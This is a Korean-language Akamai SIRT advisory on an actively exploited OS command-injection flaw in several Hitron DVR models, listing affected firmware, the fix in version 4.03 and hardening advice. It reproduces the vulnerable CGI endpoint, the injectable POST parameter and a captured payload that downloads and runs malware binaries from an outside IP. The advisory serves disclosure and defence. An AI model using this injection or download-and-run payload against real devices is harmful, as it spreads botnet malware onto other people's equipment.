클라우드 컴퓨팅이 필요하신가요? 지금 시작해보세요

Hitron DVR의 취약점을 적극적으로 악용: 수정됨, 패치 사용 가능

Akamai Wave Blue

에 의해 작성

Aline Eliovich, Kyle Lefton, Chad Seaman, 그리고 Larry Cashdollar

January 30, 2024

알린 엘리오비치(Aline Eliovich)

에 의해 작성

Aline Eliovich

보안 분야에서 6년 경력을 쌓은 알린 엘리오비치(Aline Eliovich)는 현재 Akamai의 보안 인텔리전스 대응팀에서 연구원으로 근무하고 있습니다. 홀론 기술 연구소에서 컴퓨터 공학을 전공했습니다. 알린은 리서치에 다양한 OSINT(Open Source Intelligence) 방법을 사용하는 것을 즐깁니다.

Akamai 블루 웨이브

에 의해 작성

Kyle Lefton

카일 레프톤(Kyle Lefton)은 Akamai 보안 인텔리전스 대응팀의 보안 리서치 인턴입니다. 국방부의 인텔리전스 애널리스트였던 카일은 사이버 방어, 위협 리서치, 카운터 인텔리전스 부문에서 다년간 경력을 쌓았습니다. 자신 있는 분야는 새로운 위협 조사, 취약점 리서치, 위협 그룹 매핑 분야입니다. 여가 시간에는 친구, 가족과 함께 시간을 보내고 전략 게임과 아웃도어 하이킹을 즐깁니다.

Chad Seaman headshot

에 의해 작성

Chad Seaman

채드 시먼(Chad Seaman)은 Akamai 보안 인텔리전스 대응팀의 수석 보안 연구원이자 팀장입니다. 자랑스럽게 자신을 '인터넷 쓰레기 처리장 다이버'라고 부르며, 인터넷에서 발견한 먼지와 진흙탕을 샅샅이 뒤지는 것이 취미입니다. 채드는 프로그래머로 경력을 쌓기 시작했으며 유출 조사를 통해 보안, 악용, 포렌식 분야를 접한 후 보안에 빠르게 심취하게 되었습니다. 요즘은 멀웨어 조사, 리버스 엔지니어링, 취약점 리서치, DDoS, 사이버 범죄 조사에 많은 시간을 할애하고 있습니다. 채드는 여가 시간에 비행기를 날리고, 먼 거리에서 종이에 구멍을 뚫고, 자연에서 시간을 보내며, 오프로드 자전거로 숲과 산책로를 달리는 것을 특히 좋아합니다.

Larry Cashdollar

에 의해 작성

Larry Cashdollar

래리 W. 캐시달러(Larry W. Cashdollar)는 보안 분야에서 18년 이상 취약점 연구원으로 활동해 왔으며 현재 Akamai Technologies의 보안 사고 대응 팀의 일원입니다. 래리는 서던 메인 대학교에서 컴퓨터 공학을 전공했습니다. 래리는 150개 이상의 CVE를 문서화했으며 BSides Boston, OWASP Rhode Island, Defcon에서 자신의 연구 내용에 대한 프레젠테이션을 진행했습니다. 그는 여가 시간에 야외를 즐기고 미니 자전거 엔진을 재조립합니다.

Akamai SIRT는 InfectedSlurs를 발견하는 과정에서, 활발히 악용되고 있는 여러 Hitron DVR 디바이스 모델의 취약점을 밝혀냈습니다.

Executive Summary

알아야 할 사항

Akamai SIRT는 InfectedSlurs를 발견하는 과정에서, 활발히 악용되고 있는 여러 Hitron DVR 디바이스 모델의 취약점을 밝혀냈습니다. Hitron 디바이스는 대한민국의 Hitron Systems가 제조합니다.

이 취약점을 통해 인증된 공격자는 POST 요청을 통해 관리 인터페이스로 페이로드를 전달해 OS 명령 인젝션을 수행할 수 있습니다. 현재 설정에서는 캡처된 페이로드에서 디바이스 기본 인증정보를 활용합니다.

영향받는 디바이스 및 펌웨어 버전은 다음과 같습니다.

  • DVR HVR-4781: 버전 1.03~4.02

  • DVR HVR-8781: 버전 1.03~4.02

  • DVR HVR-16781: 버전 1.03~4.02

  • DVR LGUVR-4H: 버전 1.02~4.02

  • DVR LGUVR-8H: 버전 1.02~4.02

  • DVR LGUVR-16H: 버전 1.02~4.02

벤더사(Hitron Systems)는 이 취약점을 해결하기 위해 새로운 펌웨어 버전을 출시했으며, 영향받는 모든 모델을 가능한 한 빨리 4.03 이상의 펌웨어로 업그레이드할 것을 권장합니다. 이 권고는 CISAKISA를 통해서도 게시되었습니다. KISA는 개별 CVE와 관련된 권고도 발표했으며, 다음 링크에서 확인할 수 있습니다.

관찰된 악용

2023년 10월 말 Akamai SIRT 분석가는 거의 남용되지 않는 TCP 포트를 표적으로 삼은 허니팟에서 활동이 급증하는 것을 발견했습니다. 프로브는 낮은 주파수였으며 POST 요청을 통해 처음으로 /cgi-bin/system_ntp.cgi 항목에 대한 인증(그림 1)을 시도한 후 명령 인젝션 악용 시도(그림 2)를 감행했습니다.  표적이 된 디바이스는 명령 입력을 통해 RCE에 취약한 Hitron Systems DVR 디바이스(그림 3)였습니다. 인증을 마친 후 공격자는 타임서버 매개변수에서 /cgi-bin/system_ntp.cgi항목에 대한 POST 요청을 통해 명령 인젝션의 취약점을 노렸습니다.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

그림 1: 인증 시도

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

그림 2: 악용 시도

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

그림 3: 캡처된 RCE 페이로드

보호

이 취약점의 영향을 받는 디바이스를 실행하는 Hitron DVR 사용자는 즉시 RCE 취약점을 수정하는 최신 펌웨어 버전(4.03 이상)으로 업그레이드해야 합니다.  

또한 이러한 위협과 미래의 위협으로부터 보호하기 위해 여러 가지 보안 조치를 구축해야 합니다. 먼저, 영향받는 디바이스를 사용하는 기업과 개인은 보안을 강화하기 위해 기본 로그인 인증정보를 즉시 변경해야 합니다. 네트워크 트래픽 및 로그를 정기적으로 모니터링하면 의심스러운 활동을 조기에 탐지하는 데 도움이 될 수 있습니다. 식별된 취약점을 해결하기 위해서는 디바이스 제조업체에서 제공하는 보안 패치 및 업데이트를 적시에 설치하는 것이 중요합니다.

보안 연구원, 위협 인텔리전스 공급업체, 동종 업체와의 협력을 통해 새로운 위협과 취약점에 대한 최신 정보를 얻을 수 있습니다. 마지막으로, 연결된 디바이스의 업데이트된 재고를 유지 관리하고 네크워크 세그멘테이션을 구축하여 이러한 공격의 잠재적인 영향을 제한할 수 있습니다.

결론

Hitron 시스템 및 관련 디바이스에서 식별된 보안 문제를 해결하려면 사용자 인식, 즉각적인 패치 적용, 선제적 모니터링, 사이버 보안 커뮤니티 내 협업을 결합한 다각적인 접근 방식이 필요합니다. 이러한 조치를 취하면 기업과 개인이 관찰된 악성 활동으로 인한 리스크를 크게 줄일 수 있습니다.

관심 유지

SIRT 및 기타 Akamai 보안 리서치 그룹에서 찾은 위협 및 기타 조사 결과를 알아보려면 X(기존의 Twitter)에서 Akamai를 팔로우하거나 SIG 허브를 확인하시기 바랍니다.

Akamai SIRT는 취약점을 벤더사에 보고하는 데 도움을 준 CISA, US-CERT, KISA의 직원들에게 감사의 말씀을 전합니다.



Akamai Wave Blue

에 의해 작성

Aline Eliovich, Kyle Lefton, Chad Seaman, 그리고 Larry Cashdollar

January 30, 2024

알린 엘리오비치(Aline Eliovich)

에 의해 작성

Aline Eliovich

보안 분야에서 6년 경력을 쌓은 알린 엘리오비치(Aline Eliovich)는 현재 Akamai의 보안 인텔리전스 대응팀에서 연구원으로 근무하고 있습니다. 홀론 기술 연구소에서 컴퓨터 공학을 전공했습니다. 알린은 리서치에 다양한 OSINT(Open Source Intelligence) 방법을 사용하는 것을 즐깁니다.

Akamai 블루 웨이브

에 의해 작성

Kyle Lefton

카일 레프톤(Kyle Lefton)은 Akamai 보안 인텔리전스 대응팀의 보안 리서치 인턴입니다. 국방부의 인텔리전스 애널리스트였던 카일은 사이버 방어, 위협 리서치, 카운터 인텔리전스 부문에서 다년간 경력을 쌓았습니다. 자신 있는 분야는 새로운 위협 조사, 취약점 리서치, 위협 그룹 매핑 분야입니다. 여가 시간에는 친구, 가족과 함께 시간을 보내고 전략 게임과 아웃도어 하이킹을 즐깁니다.

Chad Seaman headshot

에 의해 작성

Chad Seaman

채드 시먼(Chad Seaman)은 Akamai 보안 인텔리전스 대응팀의 수석 보안 연구원이자 팀장입니다. 자랑스럽게 자신을 '인터넷 쓰레기 처리장 다이버'라고 부르며, 인터넷에서 발견한 먼지와 진흙탕을 샅샅이 뒤지는 것이 취미입니다. 채드는 프로그래머로 경력을 쌓기 시작했으며 유출 조사를 통해 보안, 악용, 포렌식 분야를 접한 후 보안에 빠르게 심취하게 되었습니다. 요즘은 멀웨어 조사, 리버스 엔지니어링, 취약점 리서치, DDoS, 사이버 범죄 조사에 많은 시간을 할애하고 있습니다. 채드는 여가 시간에 비행기를 날리고, 먼 거리에서 종이에 구멍을 뚫고, 자연에서 시간을 보내며, 오프로드 자전거로 숲과 산책로를 달리는 것을 특히 좋아합니다.

Larry Cashdollar

에 의해 작성

Larry Cashdollar

래리 W. 캐시달러(Larry W. Cashdollar)는 보안 분야에서 18년 이상 취약점 연구원으로 활동해 왔으며 현재 Akamai Technologies의 보안 사고 대응 팀의 일원입니다. 래리는 서던 메인 대학교에서 컴퓨터 공학을 전공했습니다. 래리는 150개 이상의 CVE를 문서화했으며 BSides Boston, OWASP Rhode Island, Defcon에서 자신의 연구 내용에 대한 프레젠테이션을 진행했습니다. 그는 여가 시간에 야외를 즐기고 미니 자전거 엔진을 재조립합니다.